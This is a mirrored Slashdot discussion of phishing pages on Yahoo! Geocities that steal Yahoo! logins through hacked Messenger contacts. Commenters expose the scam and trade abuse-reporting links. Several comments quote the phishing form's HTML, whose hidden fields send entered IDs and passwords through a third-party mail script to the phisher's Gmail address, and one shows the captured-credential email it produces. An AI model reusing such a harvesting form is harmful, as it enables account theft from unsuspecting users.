Slashdot Mirror
Phishing in Yahoo! Geocities?
Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing to anything to counter these attacks."
Did you report it to Yahoo!? Or just Slashdot?
and I quote:
"NOTICE: We collect personal information on this site."
Ya think?!?
I never made the connection! Thanks Mr. Obvious!
Karma: Chameleon (mostly due to the fact that you come and go).
For those of you who are bored, you could try to get any of the addresses listed in the web form taken down.
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
I'm sure google would have a fun time going after whoever referred havinfunfun@gmail.com.
When I was asked for my username, password, and sexual orientation...
You take it, I don't want it...
Van Cutter Romney asks questions to the wrong people. I'd like to know if he'll ever ask the appropriate people.
What gives?
And yet the worst fishing site on geocities is still up-- since something like 1998? Someone's asleep at the wheel.
I found it obvious when I right clicked the page and it said Content (C) Flickr...I mean, the site says we are owned by Yahoo! then they claim Flickr owns the content.
Also consider the SSL link seems to not be phished. I tried dummy data in both login forms and it said "Page Not Found" for the phished page that was not secured, while it said "ID not found" when I entered the information on SSL site. Someone should report the site http://www2.fiberbit.net/ to the domain registrar since the form submission is done through a page on that server. I'm quite surprised the person didn't try to mask the email address, obviously that form is used on quite a number of sites since the email address is clearly specified in the page content -- this person deserves to be caught. I just hope no one bought into the scam....
People who use Flickr rock!
Not only does Flickr make you smell better, it also makes you more attractive.
Username: ohgodatleastspendthe
Password: $5foradomainname
The destination page is a 404 (I don't think it works?).
I was like, "Huh? Pissing in Yahoo Geocities?" Sounds good to... oh wait... phishing...
You are about 8 months late!
I initially was told that all you had to do was go to the site, by my roommate, but after a while found out he lied to me, and he logged in like this guy posted.
I've since got him the netcraft toolbar, which tells and can block you from going to phish sites, or at least warn you about it.
Only 'flamers' flame!
Does slashdot hate my posts?
Maybe I'm missing something, but why the hell are you asking us?
What I'm listening to now on Pandora...
Ill be honest. I spent all that time to trying to figure out how the website was trying scam people out of money. Then I realized that it was nothing more that a pun. Great job and very subtle and it somehow being modded insightful made it even more funnyy.
Ooo man the floppy drive is broken. No wait. The computer is just upside down.
report the webpage and you're done.
Geocities is a kinda abandoned place (So much that webcomics make fun of it). There's no customer service, everything's automated there. The only thing that (I hope) isn't, is the "report offensive page" etc. The only change done to it was aesthetic and in the code. But the infrastructure remains.
In other words, geocities servers do NOT have personnel searching and identifying phishing sites on them. They have to rely on the users.
(This and popup ads led to the fall of free homepages. Most pages now are categorized in specialized sites: webcomics, blogs, art, fiction, and with youtube, videos).
This was bound to happen sooner or later. Yahoo neglected geocities, is it a mystery that it became a meeting point for illegal activities?
The next version of Geocities will require the user to check a box verifying that he is not a phisher.
If you view the source of the form on the phishing site you'll see that email address, it suuuure would be fun to spam that with fake info. Other info from the form that might be useful is:
Subject: "Yahoo id"
the URL for the mail form thats used is: http://www2.fiberbit.net/form/mailto.cgi
The usernames and passwords might go to a gmail account, but not sure it actually does or not - depends on the mailto.cgi.
_ good/index.html">
Extract:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://www.geocities.com/got_milf.does_you
http://add.yahoo.com/fast/help/geo/cgi_abuse
But it tried to redirect me to some MILF site after I gave it a bogus login.
Ooogh.
$B$3$l$O%a!(B: ip0.0.0.0.ma.dl.cox.net / 0.0.0.0
$BAw?.85%V%i%&%6(B: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
$BAw?.85#U#R#L!!(B:
login = bbb
passwd = bbb
Gibberish text is probably an encoding shortcoming from the crap e-mail account i had it sent to.
There is no XUL, only WebExtensions...
Yahoo! has huge security problems with their accounts. So does Hotmail. I'm not going to get into the details, but let me say this. For my friends and family who forgot their password to their Yahoo! account, it's fairly easy to get their account back for them.
While I work for Yahoo! I do not speak for them officially. I do not work on any of the products mentioned.
We do have teams of people who work to fight any abuse of any of our products. When sites like those are found, they are taken down.
Please report any instances of situations like those you described to:
http://abuse.yahoo.com/ or abuse@yahoo-inc.com
Who *doesn't* know that Yahoo/Geocities is a major phishing/script-kiddie resource and host?? This isn't news to anyone who has experience chatting in Yahoo chatrooms.
.exe files, disguised as videos or whatever, that they spam links to in yahoo chatrooms with, in an almost constant barrage.
.exe file.
There are script-kiddies and S/N stealers that constantly use geocities pages to host everything from phishing pages to outright trojan
There is a subgroup of huge-egoed "1337" yahoo chatters that deal in stolen screen names and "illegal" or "illy" names in trade for other names, or straight cash.
Yahoo seems to pay no attention whatsoever to their abuse reporting system. I've reported a geocities page hosting a trojan multiple times, and the site remained up for over a year, with the same trojan
One of the biggest things driving this subgroup of crackers and script-kiddies are the chat-bot spammers, who buy lists of stolen screen-names/accounts on which to log-on their spam/porn bots. There is an entire underground economy of stolen accounts/screen-names much larger and much older than any of the MMORPG gold trader/seller economies that have gotten so much press of late.
I think Yahoo, despite all of their denials, are in bed with the spam/porn-bot operators, and turn a blind eye, even protecting them. I know people who chat on Yahoo that run "booter" programs that will kick/flood a chatter out of a room, even completely disconnect someone from Yahoo. They regularly boot normal chatters with impunity, but fear to boot "porn/spam-bots", as Yahoo will quickly shut down the booters' "bot" account(s) (most 'booter' programs utilise 'bots' to send their disconnect packets/IM floods/etc) and even ban the booter-operators' account and block that IP address.
If I were this fellow, I'd consider myself lucky that the only thing he got from a geocities webpage was a phishing page, as opposed to a virus or trojan with much more serious and far-reaching consequences than having a Yahoo screen-name/account cracked or stolen.
Cheers!
Strat
Progressivism (aka US 'Liberalism'): Ideas so good they need a police/surveillance-state to enforce.
Yup, I was a victim of this YM phishing because of my dumb user error. Here's my story...
:(
:(
I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):
Session Start (ant:onion): Sat Jan 07 02:28:11 2006
[02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/
[02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
[03:03] ant: I don't see anything even after logging in.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
Session Close (onion): Sat Jan 07 03:07:05 2006
I thought YM servers went down or something. In the day time, it hit me. I got phished! My password was already changed (duh!).
I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal datas in online accounts like Y! nor do I remember them. Plus, I signed up for my account like a decade ago.
My buddies on the contact list (had a local back up copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.
I continued to e-mail Y!, but got no where. I eventually gave up and them told to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.
Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
www.my-photo-albums.tk
www.myphoto-album.tk
I was glad I didn't use Yahoo account other than IM and launch.com. I hate these bundled services within a single account like Passport.
As you can see social engineering at its best even on people who knows computers. I fell for it.
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
Just tell gmail's abuse department about this article and phishing. :)
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
http://www.castlecops.com/pirt
"PIRT Squad Fried Phish(TM) Phishing Incident Reporting and Termination (PIRT) Squad
A global phishing termination operation launched by CastleCops and Sunbelt Software, the volunteer PIRT Squad is comprised of folks who report phish, investigate phish, and actively work on phish takedown and termination (original concept by Robin Laudanski). PIRT is funded by CastleCops. Become a PIRT Squad terminator by reporting phish today!"
Anonymous Yahoo! Employee: We do have teams of people who work to fight any abuse of any of our products.
i n=yahoo.com&submitted=1123294881&table=abuse
i n=yahoo-inc.com&submitted=1123294118&table=abuse
:P
Unblock and properly 'man' abuse@yahoo.com and abuse@yahoo-inc.com then we'll talk about stopping user wrongdoing at Yahoo!
Proof from rfc-ignorant.org:
http://www.rfc-ignorant.org/tools/detail.php?doma
http://www.rfc-ignorant.org/tools/detail.php?doma
You corporate tool...
As are about all gainfully/legally employed people [like myself at the moment] not gainfully/legally self-employed... =/
If you are 100% self-employed, count your blessings -- you've escaped the 'rat race' that saps the vitality of mankind everywhere in the name of 'increased corporate profit'....
Check out this blog article which goes into detail on this new phishing scheme.